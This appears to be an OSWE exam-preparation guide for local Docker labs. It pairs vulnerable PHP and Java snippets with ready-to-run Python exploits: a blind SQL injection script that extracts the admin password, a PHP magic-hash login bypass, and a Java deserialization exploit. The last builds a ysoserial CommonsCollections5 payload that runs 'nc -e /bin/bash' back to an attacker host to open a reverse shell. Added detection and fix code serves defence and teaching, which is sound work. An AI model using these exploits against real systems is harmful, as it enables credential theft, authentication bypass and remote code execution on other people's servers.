OSWE Lab Preparation

[ SYSTEM READY ] [ INITIATING PROTOCOL ]

This guide covers the white-box analysis and exploitation of three distinct vulnerability classes found in the provided labs: Blind SQL Injection, PHP Type Juggling, and Java Insecure Deserialization.

1. Environment Setup

The labs are containerized for easy deployment. You will need Docker installed to run these.

Pull and Run the Global Docker Images:

2. Vulnerability Analysis & Full Exploit Code

A. Blind SQL Injection (Boolean-Based)

The Vulnerability:
The application builds its SQL query by concatenating the user-supplied `id` parameter straight into the statement, with no parameterization or input validation.

Vulnerable Code (White Box):

<?php
$id = $_GET['id'];
// VULNERABLE: untrusted input is concatenated straight into the statement
$query = "SELECT * FROM courses WHERE id = " . $id;
$result = $mysqli->query($query); // $mysqli: the lab's open database connection (assumed)
// If the query returns rows, show "OSWE Course Guide"; otherwise show nothing.
// That visible difference in the response is the boolean oracle the exploit reads.
if ($result->num_rows > 0) { echo "OSWE Course Guide"; }

Full Exploit Code (sqli_poc.py):

import requests
import sys
import string

def exploit(target):
    url = target
    print(f"[+] {url} is our target")

    # Phase 1: Find Password Length
    # The page prints "OSWE Course Guide" only when the injected condition is true;
    # that string is the boolean oracle for every probe below.
    length = None
    for i in range(1, 50):
        payload = f"1 AND LENGTH((SELECT password FROM users WHERE username='admin'))={i}"
        params = {'id': payload}
        response = requests.get(url, params=params)

        if "OSWE Course Guide" in response.text:
            length = i
            print(f"[+] Length of the password is {length}")
            break

    if length is None:
        # Without a length the character loop would run with a stale counter
        print("[-] Could not determine the password length")
        return

    # Phase 2: Brute Force Characters
    charset = string.ascii_letters + string.digits + "{}_-@!?"
    password = ""

    for j in range(1, length + 1):
        for c in charset:
            # Check whether character j of the password has this ASCII value
            payload = f"1 AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),{j},1)) = {ord(c)}"
            params = {'id': payload}
            response = requests.get(url, params=params)

            if "OSWE Course Guide" in response.text:
                password += c
                sys.stdout.write(c)
                sys.stdout.flush()
                break # Move to next character
        else:
            # No match in the charset: keep the position so the output stays aligned
            password += "?"
            sys.stdout.write("?")
            sys.stdout.flush()

    print('')
    print(f"[+] Password is {password}")
    print("[!] Done :)")

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f"[+] Usage: python3 {sys.argv[0]} http://localhost/index.php")
        sys.exit(1)
    url = sys.argv[1]
    exploit(url)
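Seen from the server side, a boolean-based attack is a burst of requests that differ only in an appended predicate and produce two response sizes. As an added example (not part of the lab), the Python below parses a few constructed access-log lines in common log format and flags sources that repeatedly send probe-shaped queries (`AND` combined with `LENGTH`/`ASCII`/`SUBSTRING`), recording the distinct response sizes that make up the oracle.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the lab). The query strings
# mirror the probe shapes sqli_poc.py sends; 10.0.0.5 is the probing source.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02] "GET /index.php?id=1+AND+LENGTH%28%28SELECT+password+FROM+users+WHERE+username%3D%27admin%27%29%29%3D8 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03] "GET /index.php?id=1+AND+ASCII%28SUBSTRING%28%28SELECT+password+FROM+users+WHERE+username%3D%27admin%27%29%2C1%2C1%29%29+%3D+97 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04] "GET /index.php?id=1+AND+ASCII%28SUBSTRING%28%28SELECT+password+FROM+users+WHERE+username%3D%27admin%27%29%2C1%2C1%29%29+%3D+98 HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2024:10:00:05] "GET /index.php?id=2 HTTP/1.1" 200 498
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)')

# A boolean-based probe appends a predicate to an otherwise numeric id and
# leans on string functions to test one fact about the data at a time.
PROBE_RE = re.compile(r"\bAND\b.*\b(LENGTH|ASCII|SUBSTRING|SUBSTR|ORD)\s*\(", re.IGNORECASE)

def parse_line(line):
    """Split one log line into fields; the query string is URL-decoded so
    the probe regex sees the same text the application's SQL saw."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["query"] = unquote_plus(rec["path"].partition("?")[2])
    rec["size"] = int(rec["size"])
    return rec

def find_blind_sqli(log_text, threshold=2):
    """Return {ip: {"probes": n, "distinct_sizes": k}} for sources that sent at
    least `threshold` probe-shaped requests. Two distinct sizes for the same
    endpoint is the true/false oracle the attacker is reading."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and PROBE_RE.search(rec["query"]):
            seen[rec["ip"]].append(rec["size"])
    return {ip: {"probes": len(sizes), "distinct_sizes": len(set(sizes))}
            for ip, sizes in seen.items() if len(sizes) >= threshold}
```

The root-cause fix in the PHP above is a prepared statement with `id` bound as an integer parameter, which removes the oracle entirely; the log check is the detection layer for when that fix is missing.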

B. PHP Type Juggling (Authentication Bypass)

The Vulnerability:
PHP's loose comparison operator (`==`) compares two numeric strings as numbers, and a string of the form `0e` followed only by digits is scientific notation for zero. Two different hashes that both start with `0e` therefore compare equal, which allows bypassing authentication with so-called "Magic Hashes".

Vulnerable Code (White Box):

<?php
$password = $_POST['password'];
$hash = md5($password);
// VULNERABLE: uses '==' (loose) instead of '===' (strict), so any md5 of the
// form 0e<digits> compares equal to the stored 0e... hash
if ($hash == "0e123456789...") { echo "Authentication Bypassed"; }

Full Exploit Code (juggling_poc.py):

import requests
import sys

def php_magic_hashes():
    print("[+] Returning a PHP magic hash whose md5 evaluates to 0 under loose comparison")
    # md5("aabg7XSs") starts with 0e and continues with digits only,
    # so PHP's == reads it as the number 0
    return "aabg7XSs"

def exploit(target):
    payload = php_magic_hashes()
    data = {
        "username": "admin",
        "password": payload,
        # requests form-encodes the values itself; this is the decoded form of
        # the original "Login+%28Vulnerable%29", which would otherwise be double-encoded
        "login": "Login (Vulnerable)"
    }
    url = target

    try:
        response = requests.post(url, data=data, timeout=5)
    except Exception as e:
        print("[-] Request failed.", e)
        return

    if "authentication bypassed" in response.text.lower():
        print("[+] Successfully conducted PHP type juggling")
        print("="*100)
        print("[+] Response content snippet:", response.content[:100])
    else:
        print("[-] Not successful")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"[+] Usage: python3 {sys.argv[0]} http://target.com/login.php")
        sys.exit(-1)
    target = sys.argv[1]
    exploit(target)
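Why the loose comparison is exploitable, as an added example that is not part of the lab: the Python below emulates PHP's numeric-string rules for `==` versus `===`, shows that the md5 of "aabg7XSs" is a `0e...` string that compares equal to any other `0e...` hash, and contrasts the lab's check with a strict, constant-time one (the PHP equivalent is `hash_equals()`). The stored admin hash is constructed from the known magic string "240610708"; note that PHP 8 still compares two numeric strings numerically, so the PHP 8 comparison changes do not close this bug.

```python
import hashlib
import hmac
import re

# PHP's numeric-string grammar (PHP 8 also tolerates trailing whitespace):
# optional sign, digits with optional fraction, optional exponent.
PHP_NUMERIC_RE = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")

def php_is_numeric(s):
    return PHP_NUMERIC_RE.match(s) is not None

def php_loose_eq(a, b):
    """Emulates `$a == $b` for two PHP strings: when both are numeric strings
    they are compared as numbers (PHP 7 and PHP 8 alike), otherwise byte for
    byte. "0e<digits>" is 0 x 10^n, so every such string equals 0."""
    if php_is_numeric(a) and php_is_numeric(b):
        return float(a) == float(b)
    return a == b

def php_strict_eq(a, b):
    """Emulates `$a === $b`: same type and same bytes, no conversion."""
    return a == b

def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()

def is_magic_md5(candidate):
    """True when md5(candidate) is a leading "0e" followed only by digits."""
    return re.fullmatch(r"0e\d+", md5_hex(candidate)) is not None

# Constructed stored credential: the admin's md5 happens to be a magic hash.
STORED_ADMIN_HASH = md5_hex("240610708")

def login_vulnerable(password, stored_hash=STORED_ADMIN_HASH):
    """The lab's check: md5($password) == $stored_hash."""
    return php_loose_eq(md5_hex(password), stored_hash)

def login_fixed(password, stored_hash=STORED_ADMIN_HASH):
    """Strict, constant-time comparison (PHP: hash_equals()). A complete fix
    also replaces md5() with password_hash()/password_verify()."""
    return hmac.compare_digest(md5_hex(password), stored_hash)
```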

C. Java Insecure Deserialization

The Vulnerability:
The application deserializes attacker-controlled bytes with `ObjectInputStream.readObject()` without restricting which classes may be loaded. When a library with a known gadget chain (here Commons Collections) is on the classpath, a crafted object graph executes code during deserialization, before the application ever inspects the resulting object.

Vulnerable Code (White Box):

// Reads raw bytes from the request and converts them into a Java Object
ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Object obj = ois.readObject(); // CODE EXECUTION HAPPENS HERE

Full Exploit Code (deser_poc.py):

import requests, subprocess, sys, os

if len(sys.argv) < 4:
    print(f"Usage: {sys.argv[0]} <URL> <LHOST> <LPORT>")
    print(f"Example: {sys.argv[0]} http://victim:8080/api 10.0.0.1 4444")
    sys.exit(1)

TARGET_URL = sys.argv[1]
LHOST = sys.argv[2]
LPORT = sys.argv[3]

print("[*] Java Deserialization Exploit")
print(f"[*] Target: {TARGET_URL}")
print(f"[*] LHOST: {LHOST}, LPORT: {LPORT}")

COMMAND = f"nc -e /bin/bash {LHOST} {LPORT}"

print("[*] Generating payload...")
try:
    if not os.path.exists("ysoserial.jar"):
        print("[!] Download ysoserial.jar first!")
        sys.exit(1)
    
    # Generate payload using CommonsCollections5 gadget chain
    cmd = ["java", "-jar", "ysoserial.jar", "CommonsCollections5", COMMAND]
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    payload, error = process.communicate()
    
    if process.returncode != 0:
        print(f"[!] Failed: {error.decode()[:50]}")
        sys.exit(1)
    
    print(f"[+] Payload: {len(payload)} bytes")
    
    # Send it
    print("[*] Sending exploit...")
    r = requests.post(TARGET_URL, data=payload, 
                     headers={"Content-Type": "application/octet-stream"}, 
                     timeout=10)
    
    print(f"[+] Status: {r.status_code}")
    if r.status_code == 200:
        print("[!] 200 OK - Check your netcat listener!")
    else:
        print(f"[?] Got {r.status_code} - try other gadget chains")
        
except Exception as e:
    print(f"[!] Error: {e}")
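The fix belongs in the Java code: an `ObjectInputFilter` (JEP 290, Java 9 and backported to 8u121) or a `resolveClass` override that allowlists classes before `readObject()` constructs anything. As an added example, not part of the lab code, the Python below shows what such a filter sees on the wire: it detects Java serialized request bodies (raw or base64-encoded, the `rO0AB` prefix) and parses the root class name out of the stream prologue so a gateway check can fail closed on anything unexpected. Class names are constructed for the example.

```python
import base64
import struct

# Java serialization prologue: STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005,
# then a type code. TC_OBJECT is followed by a class descriptor that starts
# with the class name as a 2-byte-length-prefixed UTF string.
STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72

def is_java_serialized(body):
    """True for a raw serialized stream or a base64-encoded one ("rO0AB...")."""
    if body.startswith(STREAM_MAGIC):
        return True
    if body.startswith(b"rO0AB"):
        try:
            return base64.b64decode(body[:8]).startswith(STREAM_MAGIC)
        except ValueError:
            return False
    return False

def first_class_name(stream):
    """Class name of the outermost object, or None when the stream does not
    begin with the plain TC_OBJECT/TC_CLASSDESC prologue (proxy descriptors,
    back-references, arrays and strings are deliberately not parsed, so the
    caller fails closed on them)."""
    if len(stream) < 8 or not stream.startswith(STREAM_MAGIC):
        return None
    if stream[4] != TC_OBJECT or stream[5] != TC_CLASSDESC:
        return None
    (length,) = struct.unpack(">H", stream[6:8])
    name = stream[8:8 + length]
    return name.decode("utf-8") if len(name) == length else None

def is_allowed(stream, allowlist):
    """Perimeter check: accept only streams whose root class is expected."""
    name = first_class_name(stream)
    return name is not None and name in allowlist

def build_stream(class_name):
    """Constructed test input: prologue for one object of `class_name` with a
    zero serialVersionUID, SC_SERIALIZABLE flag and no fields. Enough for
    the inspector above; not a complete, loadable object."""
    n = class_name.encode()
    return (STREAM_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC])
            + struct.pack(">H", len(n)) + n + b"\x00" * 8 + b"\x02\x00\x00")
```

A root-class allowlist on the wire is a coarse perimeter check, since disallowed classes can also sit nested inside an allowed root object; the JVM-side filter applied to every class in the graph remains the control that matters.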

3. How to Run the Exploits

Prerequisite: For the Java exploit, ensure you have ysoserial.jar inside the directory where you run the script.

1. Run SQL Injection:

python3 sqli_poc.py http://localhost:8083/index.php

2. Run PHP Type Juggling:

python3 juggling_poc.py http://localhost:8082/login.php

3. Run Java Deserialization:

First, start a listener in a separate terminal:

nc -lvnp 4444

Then run the exploit:

python3 deser_poc.py http://localhost:8080/api <YOUR_IP> 4444

4. Expected Results

[screenshot: docker images and running containers]

SQL Injection Output:

[screenshot: blind SQLi PoC output]

Type Juggling Output:

[screenshot: type juggling PoC output]

Deserialization Output:

[screenshot: Java deserialization RCE output]

5. Connect & Explore

Reach out for collaborations or check out my other security research.